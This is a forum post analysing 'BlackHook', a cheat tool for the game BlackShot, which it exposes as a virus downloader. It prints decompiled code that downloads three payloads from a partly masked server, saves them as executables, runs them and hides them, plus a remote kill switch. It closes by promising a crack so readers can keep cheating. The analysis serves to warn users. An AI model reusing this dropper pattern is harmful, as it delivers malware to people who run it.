BlackHook Virus Analysis

[biexor]

Here is a full analysis of Bl@ck H0ok.

For those of you that do not understand it, just skip down to the conclusion.

BlackHook is a hack for blackshot that Many of you have tried or are using,
however, what most of you dont know is that this not just a hack, its also a virus downloader!

Since this is a self-made virus, no "normal" virus scanner will be able to report this as a virus.

TIP: You should always run suspicious files inside a Sandbox!



Analysis:

This is what BlackHook does when it is injected into a process:

[PHP]BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
BOOL result; // eax@2

if ( fdwReason == 1 )
{
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)D3D9Hook, 0, 0, 0);
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)Hook, 0, 0, 0);
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)AskPermission, 0, 0, 0);
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)RunVirus, 0, 0, 0);
result = 1;
}
else
{
if ( !fdwReason )
{
remove("bypass.exe");
remove("bypass_.exe");
remove("bypass__.exe");
}
result = 1;
}
return result;
}[/PHP]


First, Lets take a look at
[PHP]CreateThread(0, 0, (LPTHREAD_START_ROUTINE)AskPermission, 0, 0, 0);[/PHP]


The code inside this thread will download this file: "https://www.dope****/stlr/public.dat"
And save the file as "crasherror.dat"
"crasherror.dat" is just a fake file name to make it look convincing.


Whats so special about this file?

This file contains a simple boolean, which will tell BlackHook to enable or disable it self.
This means that Cocaine1 (the creator of the BlackHook Virus) can make BlackHook unusable to everyone
just by changing this text file.
So if Cocaine1 does not want you to run BlackHook, he can just delete the file from his server
.. and now BlackHook will not work anymore.



Now, lets see what RunVirus does
[PHP]CreateThread(0, 0, (LPTHREAD_START_ROUTINE)RunVirus, 0, 0, 0);[/PHP]


This is what happens inside RunVirus:

[PHP]void __stdcall RunVirus(int Handled)
{
remove("bypass.exe");
remove("bypass_.exe");
remove("bypass__.exe");
URLDownloadToFileA(0, "https://www.dope****/stlr/bypass.dat", "bypass.exe", 0, 0);
Sleep(5000);
URLDownloadToFileA(0, "https://www.dope****/bypass_.dat", "bypass_.exe", 0, 0);
Sleep(5000u);
URLDownloadToFileA(0, "https://www.dope****/bypass__.dat", "bypass__.exe", 0, 0);
Sleep(5000u);
ShellExecuteA(0, "open", "bypass.exe", 0, 0, 0);
Sleep(1000u);
ShellExecuteA(0, "open", "bypass_.exe", 0, 0, 0);
Sleep(1000u);
ShellExecuteA(0, "open", "bypass__", 0, 0, 0);
while ( 1 )
{
remove("bypass.exe");
remove("bypass_.exe");
remove("bypass__.exe");
Sleep(250u);
}
}
[/PHP]
This code should be very self-explainatory.

It downloads three viruses and opens them.

You can see that there is a BUG in this program ...
The third virus will not open itself because the filename is wrong lmao.

But if you have ever used BlackHook, you are still infected with two other viruses. Most likely Keyloggers.



Next, I will make a crack for BlackHook which removes the viruses and also enables you run BlackHook forever. Stay Tuned.